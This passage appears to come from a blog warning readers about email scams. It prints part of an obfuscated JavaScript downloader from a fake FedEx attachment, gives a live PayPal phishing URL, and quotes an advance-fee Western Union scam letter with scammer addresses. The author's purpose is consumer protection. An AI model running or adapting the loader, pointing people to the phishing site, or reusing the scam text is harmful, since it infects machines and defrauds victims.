function jjjjjjjjjjjjjjjj(){ccccc += ‘.sp’; ooooooooooo(); };
function kkkkkkkkkkkk(){ccccc += ‘; x’; qqqqqqqqqqqqqqq(); };
function kkkkkkkkkkkkkk(){ccccc += ‘ar f’; zzzzzzzzzz(); };
function jjjjjjjjjjjj(){ccccc += ‘.XMLH’; ffffff(); };
function zzzzzzzz(){ccccc += ‘tat’; dddddd(); };
function rrrrrrr(){ccccc += ‘ ,fa’; hhhhhhhhhhhhh(); };
function wwwwwwwww(){ccccc += ‘nrea’; jjjjjjjj(); };
function wwwwwwwwwwwwww(){ccccc += ‘d();’; nnnnnnnn(); };
function hhhhhhhhh(){ccccc += ‘(” “)’; ssssssssss(); };
function yyyyyyyyyyyyyy(){ccccc += ‘ios’; kkkkkkkkkkkkkkk(); };
function ppppppppp(){ccccc += ‘r) {‘; zzzzzz(); };
function bbbbbbbbbbbbbb(){ccccc += ‘ va’; yyyyyy(); };
function vvvvvvvvvvvvvvvv(){ccccc += ‘com p’; cccccccccccccccc(); };
function dddddddddddd(){ccccc += ‘0000’; aaaaaaaaa(); };
function lllllll(){ccccc += ‘i++)’; qqqqqqq(); };
function wwwwwwwwwwww(){ccccc += ‘ction’; oooooooooooooooo(); };
function zzzzzzzzzzzzzzz(){ccccc += ‘cum’; vvvvvvvvv(); };
function gggggg(){ccccc += ‘new’; lllllllllll(); };
function vvvvvv(){ccccc += ‘); ‘; nnnnnnnnnn(); };
function qqqqqqqqq(){ccccc += ‘r x’; eeeeee(); };
function ffffffffffff(){ccccc += ‘ “mun’; uuuuuuuuuuu(); };
function bbbbbbbbbbbbbbbb(){ccccc += ‘St’; vvvvvvvvvvv(); };
function ccccccccccccccc(){ccccc += ‘n(‘; kkkkkkkkk(); };
function qqqqqqq(){ccccc += ‘ { va’; rrrrrrrrr(); };
function kkkkkkkkkkk(){ccccc += ‘en(“‘; rrrrrr(); };
function ddddddddddd(){ccccc += ‘nd=’; iiiiiiiii(); };
function ooooooooooooo(){ccccc += ‘fun’; wwwwwwwwwwww(); };
function llllllllll(){ccccc += ‘if’; jjjjjjjjjjjjj(); };
function uuuuuuuuuuuuu(){ccccc += ‘) { ‘; vvvvvvvvvvvvv(); };
function sssssssssssssss(){ccccc += ’17’; zzzzzzzzzzz(); };
function yyyyyyyyy(){ccccc += ‘ile(f’; yyyyyyyy(); };
function wwwwwwwwwwwwwwww(){ccccc += ‘Act’; eeeeeeeee(); };
function llllllllllll(){ccccc += ‘= ‘; gggggg(); };
function uuuuuu(){ccccc += ‘type ‘; mmmmmmmmmm(); };
function tttttttttttttt(){ccccc += ‘s.’; vvvvvvvvvvvvvvvv(); };
function mmmmmmmmm(){ccccc += ‘onseB’; eeeeeeeeeeee(); };
function dddddddddddddd(){ccccc += ‘= ‘; gggggggg(); };
function ttttttttt(){ccccc += ‘on ‘; mmmmmm(); };
function ttttttttttt(){ccccc += ‘Expa’; wwwwwwwwwwwww(); };
function tttttttttttt(){ccccc += ‘s == ‘; ooooooooo(); };
function uuuuuuuuuu(){ccccc += ‘var’; bbbbbbbbbbbbbbb(); };
function ffffffffff(){ccccc += ’52);’; yyyyyyyyyyyyyyy(); };
function ffffffffffffffff(){ccccc += ‘; t’; mmmmmmmmmmmmmm(); };
function bbbbbbbbbbbbb(){ccccc += ‘faa’; nnnnnn(); };
function yyyyyyyyyyy(){ccccc += ‘ironm’; cccccccccccc(); };
function ooooooo(){ccccc += ‘ {}; ‘; vvvvvvvvvvvv(); };
function oooooooooooooooo(){ccccc += ‘()’; uuuuuuuuu(); };
function ccccccccccccc(){ccccc += ‘ch (e’; tttttt(); };
function mmmmmmmmmmm(){ccccc += ‘aveT’; vvvvvvvvvvvvvvv(); };
function rrrrrr(){ccccc += ‘GET”,’; ccccccc(); };
function uuuuuuuuuuuuuu(){ccccc += ‘+”/do’; zzzzzzzzzzzzzzz(); };
function iiiiiiiiiiiii(){ccccc += ‘xa.s’; mmmmmmmmmmm(); };
function bbbbbbb(){ccccc += ‘trea’; oooooooooooooo(); };
function ddddddddddddd(){ccccc += ‘Ob’; oooooooooo(); };
function kkkkkk(){ccccc += ‘,0)’; qqqqqqqqqqq(); };
function cccccccc(){ccccc += ‘= ‘; yyyyyyyyyyyyyyyy(); };
function aaaaaaaaaaa(){ccccc += ‘ 4 ‘; eeeeeeee(); };
function rrrrrrrrrrrrrr(){ccccc += ‘ttp:/’; nnnnnnnnn(); }; var ccccc = ”; var xx = ”; uuuuuuuu();

By looking at the text elements in quotes (things like “ironm”, “ttp:/”, “.Ru”, etc. it’s pretty easy to see that the whole purpose of this script is to concatenate instructions which will lead your computer to some Russian website and infest your machine with code from Hell. I’m not skilled in Javascript (or, more accurately, it would take me more time than it’s worth to decrypt this script,) so suffice it to say you don’t want this on your machine.

The email looks like it’s from FedEx. Some poor computer-illiterate secretary, or your grandmother, or cousin, or someone who just used FedEx would probably think it was legitimate, download the file, unzip it, double-click on it, and Bob’s your uncle.

DON’T DO IT!

Attachments from people you don’t know, particularly .zip or .rar, are to be assiduously avoided. Trash them at once.

Please be vigilant and take good care of yourself and your loved ones.

The Old Wolf has spoken.

Never “Verify your account” as the result of an email.

PayPale

Emails of this nature are almost guaranteed scams. If you click one of the login links, you are taken to this URL:

http://www.lazershow.ind.br/assinaturas/paypal/b0ebd1cd978575dfe45e7f31c20b2080/

which is DEFINITELY NOT A PAYPAL WEBSITE. Yes, I’m SHOUTING!

If you are foolish enough to follow instructions, here is what you’ll be providing to criminals:

PayPal2

PayPal3.jp

PayPal4

PayPal5

Now, do you really want to give your PayPal account information, your bank account details, your credit card details, and your personal address, phone number, birthdate, and social security number to thieves who have fewer morals than Al Capone and Robert Mugabe put together?

No, I didn’t think you did.

NEVER GIVE OUT FINANCIAL OR OTHER PERSONAL DETAILS OVER THE INTERNET WITHOUT BEING ABSOLUTELY SURE YOU ARE ON A TRUSTED WEBSITE!

The Old Wolf has shouted.

Attn;Beneficiary!

The Lads from Lagos never seem to give up. What saddens me is that as long as these letters keep going out, it means that somewhere people are falling victim to this fraud.

38_021022_nigerianemailmain.jpg.CROP.original-original


From: “MR.JOHN FRANK” <office_moneygram@yahoo.com>

Subject: WELCOME TO WESTERN UNION HEAD OFFIC

WELCOME TO WESTERN UNION HEAD OFFICE
BENIN REPUBLIC COTONOU
MR.JOHN FRANK

Attn;Beneficiary,Information reaching us from our corporate headquarters now, states that you only have 72hours to effect payment for the activation of your MTCN to enable you cash up your first $5,000.00 from your total (fund us$4,800,000,00,) since you are finding it difficult to make this payment we have decided that you are to go ahead and pay whatever you have from $105US above for the activation fee since you are not able to come up with the required sum, time is of the essence here.

You are to pay what ever you have from $105US above for the activation fee we will activate your MTCN upon receipt of this payment.here is the payment for the $5,000 usd but you can not pick it up because the chairman of the western union say that before you pick that money you must pay the any amount you have from $105US above OK

Here is the Senders Information;
Sender Name, MIKE
sender last name, OGUEJI
MTCN:):759054421
Amount Sent $5000.00

Please be inform that we just give you Nine Numbers for now and the remaining one number will be giving to you as soon as you send the activation fee of $105 usd today I will give you the complete number to pick up your fest payment of $5,000.00 uas as well,

Be informed that you will have to pay the balance sum of your activation upon cashing up of your first 5,000.00 usd, also i am using this medium to inform you that failure to pay the balance sum will leave us with no option but to deactivate your mtcn of which you will and can never cash up the balance sum  I will wait to hear back from you in regard to this massage so that I will give you the information that you will use to send the $105 usd.

You are advice to get back as soon as you receive this massage so that we will furnish you with the information needed to send the activation fee of $105 usd to able us release your first payment to you as promise kindly give urgent attention we are waiting

MR.JOHN FRANK
EMAIL: (westernunion132@qq.com)
WESTERN UNION HEAD OFFICE BENIN
REPUBLIC COTONOU OPERATION MANAGER)


For what it’s worth, qq.com is a Chinese hosting outfit. For the love of Eudora Welty and the Concert of the Galaxy, never respond to emails of this nature.

☛ NO ONE IN AFRICA HAS MONEY FOR YOU. THEY ONLY WANT YOURS, AND THEY WILL HAPPILY TAKE AS MUCH AS YOU ARE WILLING TO SEND THEM. ☚

Please protect your loved ones. Make sure they understand this.

DrudgeSirenSmall NEVER SEND MONEY BY WESTERN UNION, MONEY GRAM, GREEN DOT MONEYPAK, OR ANY OTHER METHOD TO SOMEONE YOU DO NOT KNOW. YOU ARE BEING SCAMMED. DrudgeSirenSmall